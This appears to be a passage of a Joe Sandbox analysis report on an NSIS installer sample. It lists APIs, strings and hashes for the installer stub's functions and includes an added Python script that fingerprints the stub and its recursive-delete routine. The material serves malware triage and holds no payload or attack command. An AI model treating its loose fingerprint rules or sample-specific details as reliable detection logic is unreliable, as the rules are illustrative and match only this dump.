4535->4533 4541 4068b2 SendMessageA 4535->4541 4542 406902 SendMessageA 4535->4542 4543 406926 SendMessageA 4535->4543 4536->4531 4537->4538 4539 4069c3 4538->4539 4540 4069a5 ShowWindow 4538->4540 4554 404c96 SendMessageA 4539->4554 4540->4539 4541->4535 4542->4535 4543->4535 4545->4521 4546 406e0a InvalidateRect 4547 406e31 4546->4547 4546->4553 4551 404da2 21 API calls 4547->4551 4549 406ced SendMessageA 4548->4549 4550 406d17 4548->4550 4549->4550 4550->4546 4552 406da4 SendMessageA SendMessageA 4550->4552 4551->4553 4552->4550 4553->4532 4553->4545 4554->4545 4555 40239a 4556 401456 18 API calls 4555->4556 4557 4023ae SetWindowLongA 4556->4557 4558 40382c 4557->4558 4559 402f9d 4560 4015b0 19 API calls 4559->4560 4561 402fa9 4560->4561 4562 401400 18 API calls 4561->4562 4563 402fbc 4562->4563 4564 402fd1 RegQueryValueExA 4563->4564 4568 402a3c 4563->4568 4565 403015 4564->4565 4566 403025 RegCloseKey 4564->4566 4565->4566 4570 407be3 wsprintfA 4565->4570 4566->4568 4570->4566 4571 401a9e 4572 401400 18 API calls 4571->4572 4573 401aaa SearchPathA 4572->4573 4574 402dab 4573->4574 4575 40319e 4576 4031c0 4575->4576 4577 4031a7 4575->4577 4578 401400 18 API calls 4576->4578 4579 401456 18 API calls 4577->4579 4580 4031cc 4578->4580 4583 4031b3 4579->4583 4585 407cde lstrlenA 4580->4585 4582 403831 4583->4582 4584 4031f8 WriteFile 4583->4584 4584->4582 4586 4097a6 4587 408a96 4586->4587 4588 408cf0 4586->4588 4587->4588 4589 408b69 GlobalAlloc 4587->4589 4590 408b4d GlobalFree 4587->4590 4591 408c55 GlobalAlloc 4587->4591 4592 408c45 GlobalFree 4587->4592 4589->4587 4589->4588 4590->4589 4591->4587 4591->4588 4592->4591 4600 402ca8 4601 402101 4600->4601 4604 402127 4600->4604 4602 407e06 18 API calls 4601->4602 4603 402115 4602->4603 4605 407836 MessageBoxIndirectA 4603->4605 4605->4604 4606 401e29 4607 401400 18 API calls 4606->4607 4608 401e35 4607->4608 4613 407cde lstrlenA 4608->4613 4614 40342b 4615 401400 18 API calls 4614->4615 4616 403437 FindFirstFileA 
4615->4616 4617 40346b 4616->4617 4620 403452 4616->4620 4622 407be3 wsprintfA 4617->4622 4619 40347d 4623 407cb6 lstrcpynA 4619->4623 4622->4619 4623->4620 4624 405bab 4625 405bc1 4624->4625 4626 405be9 4624->4626 4634 407805 GetDlgItemTextA 4625->4634 4628 405c39 4626->4628 4629 405bee SHGetPathFromIDListA 4626->4629 4630 405c04 4629->4630 4633 405bd1 SendMessageA 4629->4633 4632 403903 2 API calls 4630->4632 4632->4633 4633->4628 4634->4633 3862 40322e 3863 401456 18 API calls 3862->3863 3864 40323c 3863->3864 3865 40326b ReadFile 3864->3865 3866 4032bf 3864->3866 3868 4032ef 3864->3868 3870 4032d8 3864->3870 3865->3864 3865->3870 3871 407be3 wsprintfA 3866->3871 3869 4032fb SetFilePointer 3868->3869 3868->3870 3869->3870 3871->3870 4635 4020ae 4636 401400 18 API calls 4635->4636 4637 4020ba 4636->4637 4638 401456 18 API calls 4637->4638 4639 4020c9 wsprintfA 4638->4639 4640 40382f 4639->4640 4641 4015ae 4642 4015b0 4641->4642 4643 401400 18 API calls 4642->4643 4644 4015cc RegOpenKeyExA 4643->4644 4646 401db0 4647 401e0c 4646->4647 4648 401400 18 API calls 4647->4648 4649 401e11 4648->4649 4650 4085b8 63 API calls 4649->4650 4651 401e24 4650->4651 4652 402d34 4653 401400 18 API calls 4652->4653 4654 402d4a 4653->4654 4655 401400 18 API calls 4654->4655 4656 402d59 4655->4656 4657 401400 18 API calls 4656->4657 4658 402d6c GetPrivateProfileStringA 4657->4658 4659 402dab 4658->4659 4660 4057b5 4661 4057d0 4660->4661 4662 40597b 4660->4662 4666 404d65 18 API calls 4661->4666 4663 405987 4662->4663 4664 405a0b 4662->4664 4672 4059b0 GetDlgItem SendMessageA 4663->4672 4687 405a06 4663->4687 4665 405a14 GetDlgItem 4664->4665 4664->4687 4667 405b02 4665->4667 4668 405a37 4665->4668 4670 40583a 4666->4670 4675 405b14 4667->4675 4667->4687 4668->4667 4674 405a65 SendMessageA 4668->4674 4669 404f0f 8 API calls 4671 405b9a 4669->4671 4673 404d65 18 API calls 4670->4673 4697 404d44 EnableWindow 4672->4697 4677 405857 CheckDlgButton 4673->4677 4682 405aa2 SetCursor 
ShellExecuteA 4674->4682 4678 405b43 4675->4678 4679 405b1a SendMessageA 4675->4679 4694 404d44 EnableWindow 4677->4694 4678->4671 4683 405b4e SendMessageA 4678->4683 4679->4678 4680 405a00 4698 404d05 SendMessageA 4680->4698 4689 405afa SetCursor 4682->4689 4683->4671 4685 405880 GetDlgItem 4695 404c96 SendMessageA 4685->4695 4687->4669 4688 4058a1 SendMessageA 4690 4058e0 SendMessageA SendMessageA 4688->4690 4691 4058d4 GetSysColor 4688->4691 4689->4667 4696 407cde lstrlenA 4690->4696 4691->4690 4694->4685 4695->4688 4697->4680 4698->4687 4699 402db6 4700 402e00 4699->4700 4701 402dbf 4699->4701 4703 401400 18 API calls 4700->4703 4702 4015b0 19 API calls 4701->4702 4704 402dcb 4702->4704 4706 402a3c 4703->4706 4705 401400 18 API calls 4704->4705 4704->4706 4707 402de2 RegDeleteValueA RegCloseKey 4705->4707 4707->4706 4708 401737 4709 406fcb 23 API calls 4708->4709 4710 401747 4709->4710 4711 401fb8 4712 401456 18 API calls 4711->4712 4713 401fc4 4712->4713 4714 401456 18 API calls 4713->4714 4715 401fd3 4714->4715 4716 402339 4717 401456 18 API calls 4716->4717 4718 402345 IsWindow 4717->4718 4719 402354 4718->4719 4720 401db9 4721 401400 18 API calls 4720->4721 4722 401dc5 4721->4722 4723 407836 MessageBoxIndirectA 4722->4723 4724 401dd8 4723->4724 4725 40183b 4726 401400 18 API calls 4725->4726 4727 401847 SetFileAttributesA 4726->4727 4728 401aff 4727->4728 4729 40573f 4730 405792 4729->4730 4731 405759 4729->4731 4732 404f0f 8 API calls 4730->4732 4733 404d65 18 API calls 4731->4733 4734 4057a8 4732->4734 4735 405770 4733->4735 4737 4077fb SetDlgItemTextA 4735->4737 4738 402cbf 4739 402cd1 4738->4739 4740 402cc5 4738->4740 4742 402ceb 4739->4742 4743 401400 18 API calls 4739->4743 4741 401400 18 API calls 4740->4741 4741->4739 4744 401400 18 API calls 4742->4744 4747 402d05 4742->4747 4743->4742 4744->4747 4745 401400 18 API calls 4746 402d14 WritePrivateProfileStringA 4745->4746 4748 402d2d 4746->4748 4747->4745

Control-flow Graph

Function 00404375, basic blocks in graph order with the APIs called in each (the rendered graph, including its executed / not-executed colouring, does not survive extraction):
• 404375-404399: SetErrorMode, GetVersion; 40439b-4043aa: call 408299; 4043c0-4043c3: call 40820e; 4043c8-4043d7: lstrlenA
• 4043d9-404492: call 408299 (x2), InitCommonControls, OleInitialize, SHGetFileInfoA, call 407cb6, GetCommandLineA, call 407cb6, GetModuleHandleA
• 40449e-4044b8: call 4078a4, CharNextA; 4044be-404541: command-line scanning loop (404523-40453f: call 407cb6); 404543-40455b: call 4078a4 (back to 4044be)
• 404560-40457e: GetTempPathA, call 4042bc; 404580-40459f: DeleteFileA, call 403f03; 4045a7-4045db: GetWindowsDirectoryA, call 407ce8, call 4042bc
• 4045f4-404609: call 4078a4; 40461c-40462d: call 40815b; 404639-40465d: call 407cb6 (x2)
• 404662-404681: call 4082eb, call 407ce8; 404683-404698: call 407ce8; 404699-4046c8: call 407ce8, lstrcmpiA
• 4046d9-4046de: call 4076b0; 4046e0: call 40774b; 4046e5-4046fb: SetCurrentDirectoryA; 4046fd-404712 and 404713-404735: call 407cb6
• 40473e-404767: call 407e06, DeleteFileA; 404769-40478b: CopyFileA; 40478d-4047cf: call 408311, call 407e06, call 407779; 4047d1-4047dc: CloseHandle; 4047dd-4047e4 (back to 40473e); 4047ea-404800: call 408311
• 404802-40480c: call 4060fd; 404817-404824: call 404316, OleUninitialize; 404826-40483f: call 407836
• 404851-40488e: call 408299 (x3); 4048a1-4048c3: GetCurrentProcess; 404933-404942: call 408299; 404944-40495d: ExitWindowsEx; 404991-40499d: call 403903
• 4049ac: ExitProcess
APIs
• SetErrorMode.KERNEL32 ref: 00404388
• GetVersion.KERNEL32 ref: 0040438F
• lstrlenA.KERNEL32 ref: 004043CC
• InitCommonControls.COMCTL32(?,UXTHEME), ref: 004043F8
• OleInitialize.OLE32 ref: 00404405
• SHGetFileInfoA.SHELL32 ref: 0040443A
• GetCommandLineA.KERNEL32(00000000,00000000), ref: 00404459
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00404478
• CharNextA.USER32 ref: 004044B1
  • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
  • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
• GetTempPathA.KERNEL32(00000001,00000001), ref: 0040456F
• DeleteFileA.KERNEL32 ref: 0040458D
• GetWindowsDirectoryA.KERNEL32 ref: 004045B6
• OleUninitialize.OLE32(?,00000000), ref: 0040481C
• ExitProcess.KERNEL32 ref: 004049AC
  • Part of subcall function 004078A4: CharNextA.USER32 ref: 004078BE
• GetCurrentProcess.KERNEL32(?,?,00000000,?,00000000), ref: 004048A1
• ExitWindowsEx.USER32 ref: 00404953
  • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
  • Part of subcall function 004060FD: lstrcmpiA.KERNEL32 ref: 0040627B
  • Part of subcall function 004060FD: GetFileAttributesA.KERNEL32 ref: 0040628A
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: File$CharExitHandleModuleNextProcessWindows$AddressAttributesCommandCommonControlsCurrentDeleteDirectoryErrorInfoInitInitializeLineModePathProcTempUninitializeVersionlstrcmpilstrcpynlstrlen
• String ID: /D=$ _?=$"C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe" $%$($62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Software Setup$UXTHEME
• API String ID: 3796326152-2777048487
• Opcode ID: 7881eb858f1781d71ca17bfc7dda02721ad144d0b1ac4bce1dc96693f36e737c
• Instruction ID: 1612ab991b91f7509b6110098b19e500dbf275244ae378e5724325f5e1753ea3
• Opcode Fuzzy Hash: 7881eb858f1781d71ca17bfc7dda02721ad144d0b1ac4bce1dc96693f36e737c
• Instruction Fuzzy Hash: 34F143F0908300AFD720AF65D94876BBBE4EF85704F41887EE5C8A7291D77C58458B6A
Uniqueness

Uniqueness Score: -1.00%
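The function listing above (entry point 00404375) and the 004085B8 listing that follows are what a triager uses to separate the NSIS installer wrapper from the payloads it drops. The `/D=`, `_?=` and `NCRC` strings are the standard NSIS command-line switches (install directory, uninstaller working directory, skip CRC check), "Error launching installer" and "Error writing temporary file ..." are the stub's own error messages, and the FindFirstFileA / FindNextFileA / DeleteFileA loop at 004085B8 is the stub's recursive delete. The Python below is an added example, not code from the Joe Sandbox report or from NSIS: it parses the "APIs" bullets and the "String ID" line in the exact form the report prints them (the sample input is copied from the two listings on this page) and applies fingerprint rules of its own. The function names and the rule thresholds are this example's choices.

```python
"""Triage of Joe Sandbox per-function listings for an NSIS installer stub.

Added example; not code from the Joe Sandbox report or from NSIS. It parses
the 'APIs' bullets and the 'String ID' line as the report prints them and
fingerprints two routines visible in this dump: the installer entry point
(NSIS switch strings /D=, _?=, NCRC next to the command-line, temp-path and
exit calls) and the FindFirstFile/FindNextFile/DeleteFile walk used for
RMDir /r. Function names and the fingerprint rules are this example's own.
"""
import re
from dataclasses import dataclass

# Sample input copied from the two function listings on this page
# (function 00404375 and function 004085B8); the bullet glyphs are kept.
ENTRY_POINT_APIS = """
• SetErrorMode.KERNEL32 ref: 00404388
• GetVersion.KERNEL32 ref: 0040438F
• InitCommonControls.COMCTL32(?,UXTHEME), ref: 004043F8
• OleInitialize.OLE32 ref: 00404405
• GetCommandLineA.KERNEL32(00000000,00000000), ref: 00404459
  • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
• GetTempPathA.KERNEL32(00000001,00000001), ref: 0040456F
• DeleteFileA.KERNEL32 ref: 0040458D
• ExitProcess.KERNEL32 ref: 004049AC
• ExitWindowsEx.USER32 ref: 00404953
"""
ENTRY_POINT_STRINGS = (
    r'/D=$ _?=$"C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe" $%$($'
    r'62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa$'
    r'Error launching installer$Error writing temporary file. Make sure your temp '
    r'folder is valid.$NCRC$NSIS Software Setup$UXTHEME'
)
RMDIR_APIS = """
• DeleteFileA.KERNEL32 ref: 004085D9
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00408674
• FindFirstFileA.KERNEL32 ref: 00408694
• FindNextFileA.KERNELBASE(?,?,?,?,?,?,?,00000000,00000000), ref: 0040879C
• FindClose.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004087AF
"""

_API_RE = re.compile(r'([A-Za-z_]\w*)\.([A-Z][A-Z0-9]*)\b')   # Name.MODULE
_REF_RE = re.compile(r'ref:\s*([0-9A-Fa-f]{8})')              # call-site address
_PATH_RE = re.compile(r'"([A-Za-z]:\\[^"]+)"')                # quoted Windows path

NSIS_SWITCHES = {'/D=', '_?=', 'NCRC'}


@dataclass
class ApiCall:
    name: str
    module: str
    ref: str        # call-site address as printed in the report ('' if absent)
    subcall: bool   # True when the report marks it 'Part of subcall function'


def parse_apis(text):
    """One ApiCall per '• Name.MODULE(...) ref: ADDR' bullet; other lines are skipped."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip('•').strip()
        m = _API_RE.search(line)
        if not m:
            continue
        ref = _REF_RE.search(line)
        calls.append(ApiCall(m.group(1), m.group(2),
                             ref.group(1) if ref else '',
                             line.startswith('Part of subcall')))
    return calls


def parse_strings(string_id_line):
    """Split a 'String ID' line on the '$' separators the report uses.

    Caveat: a string that itself contains '$' is split into pieces; the fixed
    switch names this fingerprint relies on survive that.
    """
    return [s.strip() for s in string_id_line.split('$') if s.strip()]


def is_nsis_entry_point(apis, strings):
    """NSIS switch strings plus the stub's command-line, temp-path and exit calls."""
    names = {c.name for c in apis}
    return (NSIS_SWITCHES <= set(strings)
            and {'GetCommandLineA', 'GetTempPathA', 'ExitProcess'} <= names)


def is_recursive_delete(apis):
    """Directory walk that deletes entries: Find* enumeration plus DeleteFileA."""
    names = {c.name for c in apis}
    return {'FindFirstFileA', 'FindNextFileA', 'FindClose', 'DeleteFileA'} <= names


def embedded_paths(strings):
    """Quoted Windows paths found in the function's string set."""
    return [p for s in strings for p in _PATH_RE.findall(s)]


def triage():
    """Run both fingerprints over the embedded report excerpts."""
    entry_apis = parse_apis(ENTRY_POINT_APIS)
    entry_strings = parse_strings(ENTRY_POINT_STRINGS)
    return {
        'entry_is_nsis_stub': is_nsis_entry_point(entry_apis, entry_strings),
        'entry_paths': embedded_paths(entry_strings),
        'entry_subcall_apis': [c.name for c in entry_apis if c.subcall],
        'rmdir_is_recursive_delete': is_recursive_delete(parse_apis(RMDIR_APIS)),
    }


if __name__ == '__main__':
    for key, value in triage().items():
        print(f'{key}: {value}')
```

Both fingerprints are deliberately loose (set containment, no ordering), because the report lists subcall APIs indented under the caller and the order of bullets follows call-site address, not execution order. Paths recovered from the string set are worth keeping: here the quoted `.exe` under the user's Pictures folder is where this process (0F) was running from, which ties the stub listing back to the dropped-file chain in the overview.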

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 298 4085b8-4085d4 call 40815b 301 4085f3-408601 298->301 302 4085d6-4085ee DeleteFileA 298->302 304 408603-408605 301->304 305 408615-40862e call 407cb6 301->305 303 40883e-408845 302->303 306 408824-40882a 304->306 307 40860b-40860f 304->307 312 408630-408646 call 407ce8 305->312 313 408648-408650 call 4078ce 305->313 306->303 307->305 309 4087cd-4087d8 call 408123 307->309 309->303 317 4087da-4087f8 call 407cf2 call 407a46 RemoveDirectoryA 309->317 321 408651-408654 312->321 313->321 332 4087fa-4087fe 317->332 333 40882c-408837 call 406fcb 317->333 323 408656-40865d 321->323 324 40865f-408670 call 407ce8 321->324 323->324 326 408671-4086a1 lstrlenA FindFirstFileA 323->326 324->326 330 4087b6-4087bd 326->330 331 4086a7-4086c2 call 4078a4 326->331 330->303 334 4087bf-4087cb 330->334 341 4086d2-4086d7 331->341 342 4086c4-4086d0 331->342 332->306 336 408800-408822 call 406fcb call 408311 332->336 340 40883c-40883d 333->340 334->306 334->309 336->340 340->303 341->342 343 4086d9 341->343 345 4086dc-4086df 342->345 343->345 346 4086e1-4086e6 345->346 347 4086fb-408716 call 407cb6 345->347 349 4086ec-4086ef 346->349 350 40878f-4087a6 FindNextFileA 346->350 356 408734-408749 call 407a46 DeleteFileA 347->356 357 408718-408721 347->357 349->347 353 4086f1-4086f5 349->353 350->331 355 4087ac-4087b5 FindClose 350->355 353->347 353->350 355->330 363 40874b-40874f 356->363 364 40877d-408788 call 406fcb 356->364 357->350 358 408723-408732 call 4085b8 357->358 368 40878d-40878e 358->368 365 408751-408773 call 406fcb call 408311 363->365 366 408775-40877b 363->366 364->368 365->368 366->350 368->350
APIs
• DeleteFileA.KERNEL32 ref: 004085D9
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00408674
• FindFirstFileA.KERNEL32 ref: 00408694
• FindNextFileA.KERNELBASE(?,?,?,?,?,?,?,00000000,00000000), ref: 0040879C
• FindClose.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004087AF
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: FileFind$CloseDeleteFirstNextlstrlen
• String ID: ?$C:\Users\user\AppData\Local\Temp\nso877A.tmp\*.*
• API String ID: 3200608346-2328712420
• Opcode ID: d81ed6c38f1aba44f588852f7cd5ef506992bc62bf75eddd0eb2d587c2438939
• Instruction ID: 15a94c35718d9934db7cd19974bec7e4185b96846047f3cacb9e12796964f464
• Opcode Fuzzy Hash: d81ed6c38f1aba44f588852f7cd5ef506992bc62bf75eddd0eb2d587c2438939
• Instruction Fuzzy Hash: 5E7175B0908344AED720AF25CE4576EBBF8AF45714F45887EE8C5A7381CB3D8844CB5A
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: 7251eaddbbfde7681b746ec47e7261ccbbd10af8bddef417e70452c4b2653847
• Instruction ID: 11fd5c66118aeed7f08c7c2f326ea88146cd1b5fc0ef80ef14f89fbd5f6a2284
• Opcode Fuzzy Hash: 7251eaddbbfde7681b746ec47e7261ccbbd10af8bddef417e70452c4b2653847
• Instruction Fuzzy Hash: 20E0ECB5704204AFD700BFB89C4841B7AE9AB94714B84C929B9A5CB390D634C85287AA
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed)

Control-flow graph of function 4060fd (blocks 4060fd-406556): API calls shown in the graph are lstrcmpiA, GetFileAttributesA, LoadImageA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, ShowWindow, GetClassInfoA and DialogBoxParamA; internal calls go to 408299, 407b3a, 407be3, 407ce8, 404ae0, 40815b, 407e06, 403903, 4078a4, 407cde, 407cf2, 407cb6, 4078ce, 404c0d, 40820e and 4049b4. Graph edge data omitted.
APIs
  • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
  • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
• lstrcmpiA.KERNEL32 ref: 0040627B
• GetFileAttributesA.KERNEL32 ref: 0040628A
  • Part of subcall function 00407BE3: wsprintfA.USER32 ref: 00407BFE
• LoadImageA.USER32(?,?,00000000,00000000), ref: 00406317
• RegisterClassA.USER32 ref: 00406361
• SystemParametersInfoA.USER32 ref: 00406392
• CreateWindowExA.USER32 ref: 004063F7
• ShowWindow.USER32 ref: 0040643E
• GetClassInfoA.USER32(?,00000000), ref: 00406481
• GetClassInfoA.USER32 ref: 004064A1
• RegisterClassA.USER32 ref: 004064B7
• DialogBoxParamA.USER32 ref: 004064ED
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
• Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
Similarity
• API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcmpiwsprintf
• String ID: _Nb$g
• API String ID: 3995538257-1858570778
• Opcode ID: 2f233f64265ed054fe4a50ef783cb1e0c7b699e5a95c035f069f719471a29138
• Instruction ID: 933614cd0025173359140365b9e7a590c615df7829bf1f80af9a09b402b61920
• Opcode Fuzzy Hash: 2f233f64265ed054fe4a50ef783cb1e0c7b699e5a95c035f069f719471a29138
• Instruction Fuzzy Hash: 75B10AB05083019FE710AF65D94872BBBE4EF44308F41892EE4D597391D7BC9895CB9A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed)

Control-flow graph of function 403f03 (blocks 403f03-4042b8): API calls shown in the graph are GetTickCount, GetModuleFileNameA, GetFileSize, GlobalAlloc and CreateFileA; internal calls go to 407a78, 407cb6, 4078ce, 4039fe, 403ae9, 407a23, 408904, 407ad4, 403b31, 403d52 and 408898. Graph edge data omitted.
APIs
• GetTickCount.KERNEL32 ref: 00403F0F
• GetModuleFileNameA.KERNEL32 ref: 00403F36
  • Part of subcall function 00407A78: GetFileAttributesA.KERNEL32 ref: 00407A85
  • Part of subcall function 00407A78: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
  • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
  • Part of subcall function 004078CE: lstrlenA.KERNEL32 ref: 004078DB
  • Part of subcall function 004078CE: CharPrevA.USER32 ref: 004078F0
                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,74DF3160), ref: 00403FB5
                                                                                                                                                                                                                                    • Part of subcall function 00403AE9: ReadFile.KERNEL32 ref: 00403B15
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32 ref: 00404183
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,00000000), ref: 004041DC
                                                                                                                                                                                                                                    • Part of subcall function 004039FE: DestroyWindow.USER32 ref: 00403A17
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004041EB
                                                                                                                                                                                                                                  • Error launching installer, xrefs: 00403F68
                                                                                                                                                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00404168
                                                                                                                                                                                                                                  • soft, xrefs: 00404076
                                                                                                                                                                                                                                  • Inst, xrefs: 00404066
                                                                                                                                                                                                                                  • @, xrefs: 00404294
                                                                                                                                                                                                                                  • Null, xrefs: 00404082
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
